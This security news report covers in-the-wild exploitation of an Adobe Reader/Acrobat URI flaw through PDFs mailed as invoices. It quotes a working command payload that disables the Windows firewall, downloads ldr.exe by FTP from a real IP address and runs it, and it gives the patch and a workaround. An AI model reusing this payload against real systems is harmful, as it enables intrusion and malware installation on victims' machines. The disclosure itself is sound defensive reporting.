URI vulnerability in Adobe products is being actively exploited

According to reports on the Full Disclosure security mailing list, active attacks on users using crafted PDF files are already taking place. Files containing a URL which attempts to execute commands on the system by exploiting the known URI vulnerability are being distributed via e-mail. They contain the following sequence of commands:

mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo
off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo
binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1&
start ldr.exe&\" \"&\" "nul.bat" 

Under Windows XP SP2, this initially deactivates the Windows firewall and downloads and runs a file, ldr.exe. It contains a trojan dropper (Win32.Papras) which downloads other malware onto the PC. In order to fall victim to the attack, a user does not necessarily need to click on a link in the document. Support for ActionScript, a JavaScript-based scripting language, means that the document can call the URL from Reader or Acrobat, thus starting the above command sequence, without user intervention.

The nefarious PDF files have names such as BILL.pdf, INVOICE.pdf and STATEMENT.pdf and have also been seen with subject lines such as INVOICE alacrity, STATEMET indigene and INVOICE. Adobe released Update 8.1.1 for Adobe Reader and Acrobat, which fixes the URI problem, earlier this week. Users should update to the latest version as soon as possible. Adobe advises users who, for whatever reason, are not in a position to install the update, to sever the link between the mailto URI and Adobe products in the registry. Instructions for doing so can be found on the Adobe web site.

(mba)